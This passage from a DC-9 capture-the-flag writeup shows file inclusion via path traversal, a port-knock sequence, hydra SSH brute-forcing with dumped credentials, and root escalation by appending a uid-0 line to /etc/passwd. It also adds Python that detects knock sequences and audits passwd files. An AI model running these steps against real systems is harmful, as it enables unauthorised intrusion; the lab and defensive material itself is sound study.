| 12   | rossg@example.com     | 6549638203     | Geller     | 2019-05-01 17:32:00 | Ross      | Instructor                    |
| 10   | joeyt@example.com     | 232131654      | Tribbiani  | 2019-05-01 17:32:00 | Joey      | Janitor                       |
| 8    | bettyr@example.com    | 90239724378    | Rubble     | 2019-05-01 17:32:00 | Betty     | Junior Accounts               |
| 6    | jerrym@example.com    | 24342654756    | Mouse      | 2019-05-01 17:32:00 | Jerry     | Stores                        |
| 4    | barneyr@example.com   | 324643564      | Rubble     | 2019-05-01 17:32:00 | Barney    | Help Desk                     |
+------+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
MD5-decode the password
856f5de590ef37314e7c3bdf6f8a66dc
Password
transorbital1
Try logging in; success. There is a hint "File does not exist", so some file is probably being included; tried file inclusion, and it really is there
Then, reading an expert's writeup, I found something I had not known about
http://192.168.124.153/welcome.php?file=../../../../../../../../../etc/knockd.conf
That is, an attacker scanning ports directly will not find it; it only opens after the fixed knockd sequence is accessed
The config file shows the ports that must be accessed in order
[options]
    UseSyslog

[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9842,8475,7469
    seq_timeout = 25
    command     = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn
Knock them in turn
nmap 192.168.124.153 -p 7469
nmap 192.168.124.153 -p 8475
nmap 192.168.124.153 -p 9842
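To see the knockd configuration from the monitoring side, here is an added Python example (not code from the writeup or from DC-9) that parses the openSSH stanza and then walks firewall SYN log lines to report which source completed the sequence inside seq_timeout; the config copy and the log lines are constructed, and the log line format is an assumption.

```python
"""Parse a knockd.conf and report which sources in firewall SYN log lines
completed the 'openSSH' knock within seq_timeout. Added example for this
writeup, not DC-9 code; the config copy and log lines are constructed."""
import re
from collections import defaultdict

# Trimmed copy of the knockd.conf shown above (openSSH stanza only).
KNOCKD_CONF = """\
[openSSH]
    sequence    = 7469,8475,9842
    seq_timeout = 25
"""
# Constructed log lines: "<unix-ts> SRC=<ip> DPT=<port>", SYN hits only.
SAMPLE_LOG = """\
100 SRC=10.0.0.5 DPT=7469
103 SRC=10.0.0.5 DPT=8475
105 SRC=10.0.0.5 DPT=9842
110 SRC=10.0.0.9 DPT=7469
150 SRC=10.0.0.9 DPT=8475
152 SRC=10.0.0.9 DPT=9842
"""
LINE_RE = re.compile(r"^(\d+) SRC=(\S+) DPT=(\d+)$")

def parse_knockd(text):
    """Return {section: {key: value}} for knockd's INI-like format."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = (part.strip() for part in line.split("=", 1))
            sections[current][key] = value
    return sections

def find_knocks(log, sequence, timeout):
    """Return [(ip, ts)] for each source that hit `sequence` in order with the
    whole run inside `timeout` seconds of its first knock (knockd semantics)."""
    state = defaultdict(lambda: (0, None))  # ip -> (next index, first ts)
    hits = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, ip, port = int(m[1]), m[2], int(m[3])
        idx, start = state[ip]
        if start is not None and ts - start > timeout:
            idx, start = 0, None  # timer expired: start over
        if port == sequence[idx]:
            start = ts if idx == 0 else start
            idx += 1
            if idx == len(sequence):
                hits.append((ip, ts))
                idx, start = 0, None
        else:
            # wrong port resets the source, but may itself be a first knock
            idx, start = (1, ts) if port == sequence[0] else (0, None)
        state[ip] = (idx, start)
    return hits

def open_ssh_knocks(conf=KNOCKD_CONF, log=SAMPLE_LOG):
    rule = parse_knockd(conf)["openSSH"]
    sequence = [int(p) for p in rule["sequence"].split(",")]
    return find_knocks(log, sequence, int(rule["seq_timeout"]))
```

With the sample data only 10.0.0.5 completes the sequence; 10.0.0.9 hits the right ports but takes 40 seconds, longer than seq_timeout, so knockd would not have opened port 22 for it either.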
Extract the account names and passwords dumped earlier from users and use them to brute-force ssh
cat UserDetails.csv | awk -F ',' '{print $4}' > username.txt
cat UserDetails.csv | awk -F ',' '{print $NF}' > password.txt
Crack them with hydra
hydra -L username.txt -P password.txt 192.168.124.153 ssh
Successfully cracked three users
Logging in as janitor, found a hidden file
Add it to the password list and brute-force again
Cracked one more account; try logging in
Check the permissions
sudo -l
Found a test file
Ran it, but it would not run
One directory up found the source code
The code writes the contents of the first file into the second file
So we can create a file with a root-privilege entry, then use test to write it into /etc/passwd
echo "admin:*:0:0:::/bin/bash" >> /tmp/passwd
Then use test to write /tmp/passwd into /etc/passwd
sudo ./test /tmp/passwd /etc/passwd
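The entry written to /etc/passwd here is exactly what a host-integrity check should flag. The Python audit below is an added example, not from the writeup; the passwd text it checks is constructed and includes the admin line from this step.

```python
"""Audit /etc/passwd content for entries like the one written in this
writeup (a second uid 0 account). Added example, not DC-9 code; the sample
passwd text below is constructed."""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
fredf:x:1001:1001:Fred Flintstone,,,:/home/fredf:/bin/bash
admin:*:0:0:::/bin/bash
"""

# Values that legitimately appear in the passwd password field: 'x' means
# the hash lives in /etc/shadow, the others mark a locked account.
SAFE_PW_FIELDS = {"x", "*", "!", "!!"}


def audit_passwd(text):
    """Return a list of (name, reason) findings; an empty list is clean."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, f"line {lineno}: malformed, {len(fields)} fields"))
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            findings.append((name, "non-numeric uid or gid"))
            continue
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if pw == "":
            findings.append((name, "empty password field (no password needed)"))
        elif pw not in SAFE_PW_FIELDS:
            findings.append((name, "password hash stored in passwd, not shadow"))
        if not home:
            findings.append((name, "empty home directory"))
        if not shell:
            findings.append((name, "empty shell field (defaults to /bin/sh)"))
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Run the audit against a real file."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{name}: {reason}")
```

Pair it with a stored hash of /etc/passwd (or AIDE/auditd on the file) so that a write like the one above raises an alert rather than waiting for the next manual audit.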
fredf@dc-9:/opt/devstuff/dist/test$ su admin
root@dc-9:/opt/devstuff/dist/test# whoami
root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt
[ASCII-art banner of the DC-9 flag]
Congratulations - you have done well to get to this point. Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those who have taken the time to complete the various DC challenges. I also want to send out a big thank you to the various members of @m0tl3ycr3w . They are an inspirational bunch of fellows. Sure, they might smell a bit, but...just kidding. :-) Sadly, all things must come to an end, and this will be the last ever challenge in the DC series. So long, and thanks for all the fish.
http://www.javashuo.com/article/p-ttfzxbwq-nw.html
Finally, you are welcome to visit my personal blog: https://lnng.top/ Note: this article is for technical research and discussion only; use for illegal purposes is strictly prohibited, and any consequences are your own responsibility